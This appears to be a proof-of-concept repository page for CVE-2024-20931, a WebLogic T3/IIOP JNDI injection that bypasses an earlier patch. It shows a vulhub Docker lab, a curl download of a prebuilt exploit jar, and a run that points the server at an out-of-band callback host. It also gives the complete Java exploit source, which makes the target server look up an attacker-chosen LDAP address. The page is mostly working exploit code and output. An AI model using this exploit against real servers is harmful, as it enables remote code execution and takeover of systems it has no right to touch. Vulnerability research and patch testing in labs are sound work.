WebLogic — CVE-2024-20931

CVE-2024-20931 is designed to "bypass the patch" Oracle created for CVE-2023-21839, functioning as another T3/IIOP exploit targeting WebLogic.

The project derives from research by GlassyAmadeus.

Proof-of-Concept

VulnHub 12.2.1.3

The vulnerability can be demonstrated using a Docker container running WebLogic 12.2.1.3:

N/ABASH

docker container ls 
CONTAINER ID   IMAGE                      COMMAND                  CREATED      STATUS             PORTS                                                                                  NAMES
4c1bbd132119   vulhub/weblogic:12.2.1.3   "/u01/oracle/createA…"   2 days ago   Up About an hour   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp   weblogic-vulnhub-12213

Exploitation steps:

N/ABASH

[oracle@weblogic-vulnhub-12213 exp]$ curl -OL https://github.com/0xPThree/WebLogic/raw/refs/heads/main/cve-2024-20931/CVE-2024-20931.jar
[oracle@weblogic-vulnhub-12213 exp]$ java -jar CVE-2024-20931.jar
Please input target IP:127.0.0.1
Please input target port:7001
Please input RMI Address(ip:port/exp):4diumyg78d3drm2y405khl71xs3jraky9.oastify.com

A successful exploit attempt triggers a Burp Collaborator callback, confirming code execution.

Source Code

MainClass.java:

N/AJAVA

import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Scanner;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import weblogic.deployment.jms.ForeignOpaqueReference;
 
public class MainClass {
  public static void main(String[] args) throws NamingException, NoSuchFieldException, SecurityException, IllegalArgumentException, IllegalAccessException {
    String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
    Scanner scanner = new Scanner(System.in);
    System.out.print("Please input target IP:");
    String tIp = scanner.nextLine();
    System.out.print("Please input target port:");
    String tPort = scanner.nextLine();
    String url = "t3://" + tIp + ":" + tPort;
    Hashtable<Object, Object> env1 = new Hashtable<>();
    env1.put("java.naming.factory.initial", JNDI_FACTORY);
    env1.put("java.naming.provider.url", url);
    InitialContext c = new InitialContext(env1);
    Hashtable<Object, Object> env2 = new Hashtable<>();
    System.out.print("Please input RMI Address(ip:port/exp):");
    String exp = scanner.nextLine();
    env2.put("java.naming.factory.initial", "oracle.jms.AQjmsInitialContextFactory");
    env2.put("datasource", "ldap://" + exp);
    ForeignOpaqueReference f = new ForeignOpaqueReference();
    Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
    jndiEnvironment.setAccessible(true);
    jndiEnvironment.set(f, env2);
    Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
    remoteJNDIName.setAccessible(true);
    String ldap = "ldap://" + exp;
    remoteJNDIName.set(f, ldap);
    c.rebind("glassy", f);
    try {
      c.lookup("glassy");
    } catch (Exception exception) {}
  }
}

META-INF/MANIFEST.MF:

N/A

Manifest-Version: 1.0
Created-By: Maven JAR Plugin 3.3.0
Build-Jdk-Spec: 11
Main-Class: MainClass